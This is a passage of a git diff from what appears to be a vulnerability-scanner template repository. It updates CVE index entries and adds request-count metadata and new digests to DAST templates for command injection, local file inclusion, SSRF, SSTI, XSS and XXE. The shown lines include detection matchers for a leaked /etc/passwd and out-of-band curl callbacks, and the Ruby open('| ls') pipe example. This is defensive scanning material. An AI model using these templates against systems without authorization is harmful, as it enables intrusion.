unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} @@ -2401,14 +2419,20 @@ {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} -{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} +{"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} +{"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} +{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} +{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} +{"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index a8bbfdcf41..42bcf971ec 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -2ecfbdb4298145f0427a7bc3f0ccd192 +ccfb062d74fe49f673c3566b7bedbb47 diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml index b698a2abd7..4525db436b 100644 --- a/dast/cves/2018/CVE-2018-19518.yaml +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2018-19518 cwe-id: CWE-88 metadata: + max-request: 1 confidence: tenative tags: imap,dast,vulhub,cve,cve2018,rce,oast,php @@ -46,4 +47,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100af7a090c8826b8f7eb0934a5a130dc05780441afce33b5e31dda44213d47691e02205499f8bad4923cabbddd841491363890751a97b823905e848b6ed457c4d2ecab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f31f8ec34e95d06649fe4f66b2a6d12228cfb9ee6419361b4fded4af16c0e40022100d8f11206e0687b2d6aaa0982697f3ec62313b744167209f819487b74b40df159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2021/CVE-2021-45046.yaml b/dast/cves/2021/CVE-2021-45046.yaml index 495aa6d985..5506950ac8 100644 --- a/dast/cves/2021/CVE-2021-45046.yaml +++ b/dast/cves/2021/CVE-2021-45046.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2021-45046 cwe-id: CWE-502 metadata: + max-request: 1 confidence: tenative tags: cve,cve2021,rce,oast,log4j,injection,dast @@ -59,4 +60,4 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output -# digest: 4a0a00473045022036888452035d1bfa69cbc32805393a712fdcd5595224466cc327e681ba5ef5770221008096d4d19c6975ad5bd44b06d4bc1cdfd0746570cb65c17c50cf4eb2e8a7b10d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200467421a3a87f908e224035a2fdc0fb73bd7d08eecf66f046a0d240588621b35022100b03c60899e681e43c7b4a94df8b13f392e82abc07c9dfc12f41ba3028d9b3038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index 0e37bfb162..f84783f350 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -6,19 +6,20 @@ info: severity: critical description: | Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. + remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. reference: - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om - http://www.openwall.com/lists/oss-security/2022/10/13/4 - http://www.openwall.com/lists/oss-security/2022/10/18/1 - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/ - https://github.com/silentsignal/burp-text4shell - remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-42889 cwe-id: CWE-94 metadata: + max-request: 1 confidence: tenative tags: cve,cve2022,rce,oast,text4shell,dast @@ -65,4 +66,4 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output -# digest: 4a0a00473045022100adec8de25b518a2bc2dec461a62f19c384ddac2951bd98b9ec21df05061c84d9022013f544b276c203c4846921eddf8c0be1a997fd68f5d3c8b8ff71f02873788aed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9bdde7ed78042f12c288dcd94dfa4c5ffbf89b2a02783733b4b129e589296aa02202d2ddef37d3aadf3ca90725eb0718fd6115f2528a2517b612e9f1c1c5598ee89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml index f285a8755e..630e86649e 100644 --- a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml +++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml @@ -5,11 +5,13 @@ info: author: pdteam,geeknik severity: high description: | - Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. - Successful exploitation could lead to arbitrary command execution on the system. + Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. + Successful exploitation could lead to arbitrary command execution on the system. reference: - https://portswigger.net/research/hunting-asynchronous-vulnerabilities - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md + metadata: + max-request: 4 tags: cmdi,oast,dast,blind,polyglot variables: @@ -45,4 +47,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 490a00463044022058dacdd25a0687edf873bcfed32eb383e77deb0e9ea9673e111501121429df2702202005d54354bf6a06cd873145dea3139f0b094a3baad9e7313fd9d65ef7b31876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dae6b9cabb8758e509dbba100f4df5f2372bdcad798fb059c701f05913f90ef202202f043730c663c513439af2ea02f13a86704c53b728b584e3ffaf148070eb9d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml index ab8e383ba3..4b665a402f 100644 --- a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml +++ b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml @@ -5,10 +5,12 @@ info: author: pdteam severity: high description: | - Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. + Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. reference: - https://bishopfox.com/blog/ruby-vulnerabilities-exploits - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ + metadata: + max-request: 1 tags: cmdi,oast,dast,blind,ruby,rce variables: @@ -35,4 +37,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220424a72be2b73d7cb1af746905a58c5e09a4f4a4a4b1426742a5cf4f958f0ba6a02200a7a101e4035dee4feaadf003a37eb1e4d8f3ecca542337e5dc9767075863334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/crlf/cookie-injection.yaml b/dast/vulnerabilities/crlf/cookie-injection.yaml index 026d77fdeb..651d4abfc2 100644 --- a/dast/vulnerabilities/crlf/cookie-injection.yaml +++ b/dast/vulnerabilities/crlf/cookie-injection.yaml @@ -7,6 +7,8 @@ info: reference: - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/ - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm + metadata: + max-request: 1 tags: reflected,dast,cookie,injection variables: @@ -33,4 +35,4 @@ http: part: header regex: - '(?m)(?i)(^set-cookie.*cookie_injection.*)' -# digest: 4a0a00473045022100af6e35a8b4c4d4533e339e81393faed157da2e68144557ca3fe73fb16178919c022073127c1b729ab0c8c273cbc022b2aca2b7a91a6c4c314633a20059e6b10e22ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e8261dd2cb7d91b396e9113182736c74c9d2bf320de2e64cb7f21012c6a8eff022014e9227dd17849eac076639e72ffe2e84da4bb5b4b01cffb95771968b4f0ad21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/crlf/crlf-injection.yaml b/dast/vulnerabilities/crlf/crlf-injection.yaml index 194517a9a4..0f8bdaef51 100644 --- a/dast/vulnerabilities/crlf/crlf-injection.yaml +++ b/dast/vulnerabilities/crlf/crlf-injection.yaml @@ -4,6 +4,8 @@ info: name: CRLF Injection author: pdteam severity: low + metadata: + max-request: 41 tags: crlf,dast http: @@ -68,4 +70,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 4b0a00483046022100cb88bef820fa9247bc7ddc126d8bb67c4d2371c0b4a33f64b4caa5360007f1750221009ea9e7de7dc5fe7e75cf9d215a9c2d9e3323f2caa40b7c4b39cf214f661cce48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022000c5e1faa6655bbb3adcbba890473900bb1a7ea522bbee7684da04fcd58ad613022100c3dffcd18d8133aebdad962d7013490ca3e90c50a0cfdf684c5ac54ab0ad2e34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/lfi-keyed.yaml b/dast/vulnerabilities/lfi/lfi-keyed.yaml index 93df95d6a7..b9f18b7c02 100644 --- a/dast/vulnerabilities/lfi/lfi-keyed.yaml +++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml @@ -6,6 +6,8 @@ info: severity: unknown reference: - https://owasp.org/www-community/attacks/Unicode_Encoding + metadata: + max-request: 25 tags: dast,pathtraversal,lfi variables: @@ -117,4 +119,4 @@ http: part: body regex: - '()' -# digest: 4b0a004830460221008cfcfdf2c3bffd887bfe964b433efe76af72df0f94ecea20ec1917cd00641c0f022100874e6ff747dbd4fa96124d034a126534558b56a7c317b32525e3d08199409065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f25e304b713186e620bc4448b9277a9874b77763bbf31e8b099b97bbcab85c702207be12ef346bdc11f03b226da7811a9f0fccbf6dc7e818020cdd707dade3c7508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml index 4e18560c84..7ba51807a2 100644 --- a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml @@ -7,6 +7,8 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion + metadata: + max-request: 46 tags: lfi,dast,linux http: @@ -77,4 +79,4 @@ http: part: body regex: - 'root:.*:0:0:' -# digest: 4b0a00483046022100a1e70a22bc4f17a046a9b366a9015608da82f88439ab75d052b64088a7009da8022100e29c115d86b47951f1da2fb56d7953ec1e59e93d86b70d24d34ad8c14ad3064d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c53383c7a148e9311173ee5bb2bf1177386db240eff9b2f6d8256e88cbf5f1a022100ddb39020f7957af58c62c6ec59c7094277c8193e4ab089cd4cce994da4d140d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml index 5a18f37034..2c2fda8b7f 100644 --- a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml @@ -4,6 +4,8 @@ info: name: Local File Inclusion - Windows author: pussycat0x severity: high + metadata: + max-request: 39 tags: lfi,windows,dast http: @@ -70,4 +72,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022061480301387935155bae9c0e84b58e21d4d9f1051b2e5fd9954c1397fdd9b67202204b03f96125fa3991ac2a30b43dac7a140a9ec509131b4203cd15efe2179f3b4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6f8ee294173fc629f71ec9dfe9c61ad2fbec55dce015a895d126264c15db4f902204dd04d624e3dd7f4bc7cec991d5d87df7c33db24bf681c23b6f18564abfbf644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 8c36036bcc..736d0bd7c1 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -4,6 +4,8 @@ info: name: Open Redirect Detection author: princechaddha,AmirHossein Raeisi severity: medium + metadata: + max-request: 1 tags: redirect,dast http: @@ -179,4 +181,4 @@ http: - 301 - 302 - 307 -# digest: 4b0a00483046022100e9bf67056b260dc2bc0f200f2d1853287f4f9b916a9a10f53fc7e643868df3200221008daacf7355ba1c40d34b672e78c096110e60601fdd1afa5932cd69b109c27d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220798dab0882b46e287f296c1f1ba1f9b47422c2b080486183184727f3de119087022044b26046d5aba5529bb7583ccebd65748198fff98a625c16b07432abf5a4fe8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/rfi/generic-rfi.yaml b/dast/vulnerabilities/rfi/generic-rfi.yaml index 46cb090042..3f2dbeeed6 100644 --- a/dast/vulnerabilities/rfi/generic-rfi.yaml +++ b/dast/vulnerabilities/rfi/generic-rfi.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://www.invicti.com/learn/remote-file-inclusion-rfi/ + metadata: + max-request: 1 tags: rfi,dast,oast http: @@ -30,4 +32,4 @@ http: part: body # Confirms the PHP was executed words: - "NessusCodeExecTest" -# digest: 490a0046304402201f706bb5944d3a4a5ee6f4a6920de5a04d097d9a8abaa3a4b3fc992dc96b97c6022059107f23f16f0e83e38f27702bf6184e2a17c11940d204a50a060879c932a76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029d2873c4bd52bc2237f5807f6053de597738e331d83ff8661e78b54b9f8eabc02200aef90a617b1a1997f782d347cdea43e3cba3e453b60aa77148a0632bade8d7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/sqli/sqli-error-based.yaml b/dast/vulnerabilities/sqli/sqli-error-based.yaml index c0b234e0a4..45a6066770 100644 --- a/dast/vulnerabilities/sqli/sqli-error-based.yaml +++ b/dast/vulnerabilities/sqli/sqli-error-based.yaml @@ -8,6 +8,8 @@ info: Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . + metadata: + max-request: 3 tags: sqli,error,dast http: @@ -491,4 +493,4 @@ http: - "SQ200: No table " - "Virtuoso S0002 Error" - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" -# digest: 4a0a00473045022100991ee3aa73500a4773ffbc23f50ab000999d53da3f5ab8723a4abc146eba69ee02207ef58106e21c140b29dfabac8270bbe11bd86b7b14f51b785f437e20d1f124de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100def6b6c4c85fe7786b61273d67b03bdcee001f0c68a862eaefdb3b9683291467022016d745831a21fa1c90b37bd0b0557828da77cf36662ddec1898ee436d5990a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml index 2c4d20d9e0..71389958fd 100644 --- a/dast/vulnerabilities/ssrf/blind-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -4,6 +4,8 @@ info: name: Blind SSRF OAST Detection author: pdteam severity: medium + metadata: + max-request: 3 tags: ssrf,dast,oast http: @@ -39,4 +41,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450221008e67c53d4368607db787a520c50ce1ae8c742483ea80c0e7d34ab8ef529d2c9902205c049079f166eae9a8e5c5c99b72a048bebaa05de3eb3828adb9d81fab3543aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043639a2b3d837698f0ad1d5c78b81a92dc67cfe8ea18afeb57f006cf44e2803902204a61e6eeb0c529913899c9f8aae306dbddcac78f5f41837679b8ba15ada3b5db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml index 14f81d9668..1b6ab7b830 100644 --- a/dast/vulnerabilities/ssrf/response-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py + metadata: + max-request: 12 tags: ssrf,dast http: @@ -126,4 +128,4 @@ http: part: body regex: - 'id[\s\S]+interfaces\/' -# digest: 4a0a00473045022100f1036d0d83d2d319f244f143873a16f2ae222e1f0d7dfa3a12604bc50547945c022014f428e033f9ac02ba873325301b910fde7ae7fac3613ab0388ea5d9a14e5f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssti/reflection-ssti.yaml b/dast/vulnerabilities/ssti/reflection-ssti.yaml index fae9311f3c..ac39f8bac8 100644 --- a/dast/vulnerabilities/ssti/reflection-ssti.yaml +++ b/dast/vulnerabilities/ssti/reflection-ssti.yaml @@ -7,6 +7,8 @@ info: reference: - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update + metadata: + max-request: 14 tags: ssti,dast variables: @@ -50,4 +52,4 @@ http: part: body words: - "{{result}}" -# digest: 4a0a00473045022060b24ab805932a9aae5635d76725d92d78d3366f76b103480386f7db2231b750022100cf4e3feff8153a59a9b668bbe6c989c4940074ec6857c5f4f4f920660719143d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d708d1c94470ed6b8905dc03b2e87fd5408f31412d9cb8e002a271e13eae29ed02204c3c34ba3a148255d64a9513e36fe35a57032a0c9c5ede1d1c4d14d7813cc6c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index bbb658c851..edd271186f 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -4,6 +4,8 @@ info: name: Reflected Cross Site Scripting author: pdteam severity: medium + metadata: + max-request: 1 tags: xss,rxss,dast variables: @@ -38,4 +40,4 @@ http: part: header words: - "text/html" -# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205821d73014fc8d11f73cd6310b813fe726e0a079b64f64e68b4ec264862ca17e0221008b5588348307f431509fb585b4920dc44a9de1f9330154b012be8dc4520fd47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index 26635ebaa5..ff5cbd8d9d 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -6,6 +6,8 @@ info: severity: medium reference: - 